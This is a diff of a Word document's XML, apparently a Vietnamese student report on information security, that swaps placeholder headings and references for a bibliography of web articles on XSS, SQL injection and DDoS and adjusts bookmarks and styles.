-        <w:t xml:space="preserve"> Phòng </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>chống ở cấp độ Hạ tầng</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Tường lửa Ứng dụng Web (WAF)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Các giải pháp chống DDoS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Các biện pháp an</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> toàn cho Tài khoản và Quản trị</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="1224"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>THỰC HÀNH VÀ ĐÁNH GIÁ BẢO MẬT</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Giới </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>thiệu về Kiểm thử Xâm nhập (Pentesting)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="792"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nội dung của tiểu mục cấp 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc207351937"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Tiểu mục cấp 3</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="6"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="1224"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nội dung của tiểu mục cấp 3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="3"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="3"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc207351938"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Tiểu mục cấp 4</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="7"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="1728"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Nội dung của tiểu mục cấp 4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Các công cụ và môi trường thực hành</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="1"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Mô phỏng các bước thực hiện demo</w:t>
-      </w:r>
+      <w:bookmarkStart w:id="46" w:name="_Toc208343479"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Mô phỏng các bước thực hiện demo</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="46"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5696,6 +8978,7 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Góp ý về  môn học</w:t>
       </w:r>
       <w:r>
@@ -5730,7 +9013,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc207351940"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc208343480"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5742,58 +9025,195 @@
         <w:lastRenderedPageBreak/>
         <w:t>TÀI LIỆU THAM KHẢO</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="850" w:hanging="493"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>ABC</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="2"/>
-        </w:numPr>
-        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
-        <w:ind w:left="850" w:hanging="493"/>
-        <w:contextualSpacing w:val="0"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>EFG</w:t>
+      <w:bookmarkEnd w:id="47"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_BIBL {"uncited":[],"omitted":[],"custom":[]} CSL_BIBLIOGRAPHY </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>“An Toàn Thông Tin Là Gì?” Accessed: Sept. 09, 2025. [Online]. Available: https://itsystems.vn/an-toan-thong-tin-la-gi/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>“An toàn thông tin là gì? 4 Nội dung cần biết.” Accessed: Sept. 09, 2025. [Online]. Available: https://vnce.vn/an-toan-thong-tin-la-gi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[3]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>“Các Lỗ Hổng Bảo Mật của Website bị HACKER Tấn Công Nhất.” Accessed: Sept. 09, 2025. [Online]. Available: https://lanit.com.vn/cac-lo-hong-bao-mat-cua-website-bi-hacker-loi-dung-tan-cong-nhieu-nhat.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[4]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>“XSS là gì? Kỹ thuật tấn công XSS, cách ngăn chặn hiệu quả.” Accessed: Sept. 09, 2025. [Online]. Available: https://vietnix.vn/xss-la-gi/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[5]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>“SQL Injection là gì? Cách giảm thiểu và phòng ngừa SQL Injection.” Accessed: Sept. 09, 2025. [Online]. Available: https://topdev.vn/blog/sql-injection/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[6]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>FPT C. ty C. phần B. lẻ K., “SQL Injection là gì? Độ nguy hiểm và cách phòng tránh hiệu quả.” Accessed: Sept. 09, 2025. [Online]. Available: https://fptshop.com.vn/tin-tuc/danh-gia/sql-injection-la-gi-159279</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Bibliography"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[7]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>T. Dang, “DDoS là gì và cách ngăn chặn các loại tấn công DDoS Server,” DDoS là gì và cách ngăn chặn các loại tấn công DDoS Server. Accessed: Sept. 09, 2025. [Online]. Available: https://www.vnetwork.vn/news/ddos-la-gi-va-cach-ngan-chan-cac-loai-tan-cong-ddos-server/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5806,59 +9226,59 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:bookmarkStart w:id="9" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="312" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="EE0000"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:fldChar w:fldCharType="begin"/>
-      </w:r>
-      <w:r>
-        <w:instrText xml:space="preserve"> HYPERLINK "https://fit.agu.edu.vn/bai-viet/thuc-tap-khoa-luan/qui-dinh-va-mau-trinh-bay-bao-cao-thuc-tap-cuoi-khoa-dh22pm-va-dh22th-565.html" </w:instrText>
-      </w:r>
-      <w:r>
-        <w:fldChar w:fldCharType="separate"/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="EE0000"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tham khảo thêm </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="EE0000"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Qui định và mẫu trình bày báo cáo thực tập cuối khoá (click vào đây).</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Hyperlink"/>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="EE0000"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:fldChar w:fldCharType="end"/>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:hyperlink r:id="rId12" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="EE0000"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t xml:space="preserve">Tham khảo thêm </w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:color w:val="EE0000"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>Qui định và mẫu trình bày báo cáo thực tập cuối khoá (click vào đây).</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
@@ -5957,7 +9377,7 @@
         <w:sz w:val="26"/>
         <w:szCs w:val="26"/>
       </w:rPr>
-      <w:t>4</w:t>
+      <w:t>1</w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -6986,7 +10406,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -7488,6 +10907,21 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Bibliography">
+    <w:name w:val="Bibliography"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
+    <w:uiPriority w:val="37"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00C55108"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="384"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      <w:ind w:left="384" w:hanging="384"/>
+    </w:pPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -7811,7 +11245,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
